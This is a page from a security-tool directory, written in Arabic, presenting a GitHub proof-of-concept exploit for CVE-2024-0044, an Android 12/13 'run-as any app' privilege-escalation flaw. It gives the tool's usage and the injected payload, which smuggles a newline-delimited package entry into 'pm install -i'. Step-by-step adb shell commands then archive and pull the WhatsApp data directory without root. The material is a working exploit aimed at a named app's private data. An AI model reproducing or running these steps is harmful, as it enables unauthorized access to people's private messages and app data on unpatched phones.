Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
c-CVE-2024-0044 — CVE-2024-0044: ثغرة أمنية عالية الخطورة من نوع "التنفيذ كأي تطبيق" تؤثر على إصدارَي Android 12 و13 | Kitploit
أدوات/GitHubGitHub/007criptografia/c-cve-2024-0044
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار اختراق تطبيقات الجوالتسريب البياناتما بعد الاستغلالاختبار الاختراقأمن الجوال
GitHub007criptografia/c-cve-2024-0044

c-CVE-2024-0044

CVE-2024-0044: ثغرة أمنية عالية الخطورة من نوع "التنفيذ كأي تطبيق" تؤثر على إصدارَي Android 12 و13

41منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE 2024 0044

تم تحديد CVE-2024-0044، في الدالة createSessionInternal في ملف PackageInstallerService.java، وهو ثغرة أمنية عالية الخطورة تؤثر على إصدارات Android 12 و 13. تسمح هذه الثغرة للمهاجم بتنفيذ هجوم "run-as any app"، مما يؤدي إلى تصعيد الامتيازات محليًا دون الحاجة إلى تفاعل المستخدم. تنشأ المشكلة بسبب التحقق غير السليم من المدخلات داخل الدالة createSessionInternal. يمكن للمهاجم استغلال ذلك عن طريق التلاعب بعملية إنشاء الجلسة، مما قد يمنحه وصولًا غير مصرح به إلى البيانات الحساسة وتنفيذ إجراءات غير مصرح بها على الجهاز المتأثر.

تم اكتشاف الثغرة بواسطة Meta security

تم تلخيص وإثبات المفهوم ومشاركته بواسطة Tiny hack

يمكن العثور على تفاصيل التصحيح الأمني في نشرة أمان Android

المتطلبات الأساسية

  1. قم بتمكين تصحيح أخطاء USB في هاتفك المحمول وقم بتوصيله بجهازك باستخدام كابل USB أو تصحيح أخطاء لاسلكي
  2. قم بتنزيل أي ملف apk إلى جهازك، يمكنك استخدام F-DROID

كيفية استخدام الأداة

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P يُستخدم لتحديد اسم الحزمة الهدف التي تريد تشغيلها كـ

-A لتحديد مسار ملف apk لدفعه إلى الجهاز

الاستغلال

قم بتشغيل الأداة python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

سيتم إنشاء ملف payload.txt مثل هذا

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

الأداة تقوم بأتمتة بعض الأجزاء والبعض الآخر يدوي. يمكنك الخروج بعد إنشاء الحمولة وتشغيل جميع الأوامر يدويًا أو متابعة التعليمات

بعد ذلك، ستحتاج إلى الاتصال بجهازك باستخدام adb shell ولصق الحمولة وتأكد من حصولك على رسالة Success بعد الأمر الأخير

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

بعد ذلك، نحصل على بيانات واتساب باستخدام الأوامر التالية

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

أنشئ دليلًا مؤقتًا: mkdir /data/local/tmp/wa/

أنشئ عنصرًا نائبًا لملف tar: touch /data/local/tmp/wa/wa.tar

اضبط أذونات مفتوحة بالكامل: chmod -R 0777 /data/local/tmp/wa/ لضمان أن أي مستخدم يمكنه القراءة والكتابة والتنفيذ داخل هذا الدليل.

بدّل سياق المستخدم: run-as victim للحصول على نفس أذونات مستخدم "victim".

أرشفة بيانات التطبيق الهدف: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp، لإنشاء أرشيف tar لدليل بيانات واتساب.

أخيرًا، اسحب البيانات

adb pull /data/local/tmp/wa/wa.tar

يمكنك استخراج البيانات باستخدام 7z أو أي أداة أخرى

يمكنك استخدام Whatsapp chat exporter لتحويلها إلى HTML

يتيح لك ذلك الحصول على بيانات واتساب دون الحصول على صلاحيات الجذر على جهازك.

تنزيل الأداة